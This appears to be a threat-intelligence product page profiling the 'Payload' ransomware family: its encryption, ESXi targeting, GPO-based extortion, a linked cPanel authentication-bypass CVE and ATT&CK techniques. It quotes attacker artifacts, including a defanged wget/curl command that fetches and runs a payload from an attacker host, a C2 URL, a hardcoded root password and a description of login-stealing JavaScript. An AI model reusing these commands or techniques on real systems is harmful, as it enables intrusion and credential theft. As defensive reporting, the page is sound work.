Payload is a cross-platform ransomware family active since February 2026. Its Windows and VMware ESXi-targeting variants use per-file Curve25519 ECDH key agreement and ChaCha20 encryption, append a Payload-specific extension to encrypted Windows files, and leave ransom notes. The Windows variant can encrypt local, network-accessible, and optionally specified paths; it uses multithreaded and partial-encryption routines to accelerate impact on large files. The ESXi variant enumerates virtual-machine inventory, powers off virtual machines, and encrypts large virtual-disk files. Payload incorporates defense-evasion and recovery-inhibition features, including optional in-memory ETW tampering, Windows event-log clearing, Volume Shadow Copy deletion, termination of security, backup, database, and productivity processes and services, and self-deletion. Payload operations have targeted mid-sized and large organizations globally, with reported activity concentrated in the Middle East and Asia and victims across manufacturing, healthcare, telecommunications, finance, logistics, real estate, energy, and other commercial sectors. In an April 2026 extortion incident against a Middle Eastern manufacturing organization, operators with Active Directory administrative control used malicious Group Policy Objects to distribute ransom messaging, alter user-facing settings, disable local administrator accounts and Windows Firewall, and disrupt the Windows domain; investigators found an ESXi Payload encryptor but did not confirm its execution. The operation also exfiltrated and later published victim data, demonstrating an extortion model that can combine encryption, data theft, or disruptive domain-wide actions.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access... CVE-2026-41940 is an authentication bypass flaw affecting cPanel and WHM versions after 11.40. | Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater
Modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key, changing the legalnoticecaption value to 'Welcome to Payload!' and the legalnoticetext to the ransom note text.
The threat actor authenticates to the FortiGate SSL VPN using a valid but compromised domain credential.
CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.
Modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key, changing the legalnoticecaption value to 'Welcome to Payload!' and the legalnoticetext to the ransom note text.
Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.
The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its main functions are: implanting an SSH public key, malicious PHP, and JS code into the compromised cPanel system, stealing login credentials, sending the stolen information back to a Telegram group controlled by the attackers
“Data exfiltration was observed originating from the file servers and several additional systems, and was later published on the dark web.”
The attackers also used Telegram bots as a backup channel to receive stolen information.
The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'
«На Linux-серверах организации исследователи обнаружили версию шифровальщика PAYLOAD для ESXi, однако нет никаких доказательств его запуска в рамках этой атаки».
“PAYLOAD analysis reveals that the Windows ransomware variant contains logic that targets security processes and services ... (T1685 and T1489).”
“Public PAYLOAD sample analysis reports the deletion of Windows Volume Shadow Copies before encryption (T1490).”
32 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PAYLOAD is an extortion-focused ransomware operation that obtained domain-level privileges, abused Active Directory Group Policy to distribute ransom demands and disrupt Windows endpoints without deploying malware or encrypting files on them, and exfiltrated data for subsequent leak-based extortion. An ESXi-targeting encryptor was discovered but its execution was unconfirmed.
Ransomware identified in an April 2026 compromise of a Middle Eastern manufacturing organization. A malicious GPO named PAYLOAD was used to distribute ransom notes, alter wallpapers and logon banners, and disable local administrator accounts across Windows domain systems; the identified ransomware sample targeted ESXi/Linux servers. The campaign also exfiltrated and published stolen data.
Encryptionless extortion ransomware operation that abuses malicious Active Directory Group Policy Objects to deploy ransom messaging and wallpapers, disable Windows Firewall and the local Administrator account, and disrupt domain-wide operations. The operators reportedly exfiltrated data before disruption and published it on a dark-web leak site.
An encryptionless ransomware/extortion operation that abuses malicious Active Directory GPOs to distribute ransom notes and ransom imagery, display a logon banner, disable the local Administrator account and Windows Firewall, disrupt domain-wide operations, and exfiltrate data for publication on a leak site.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.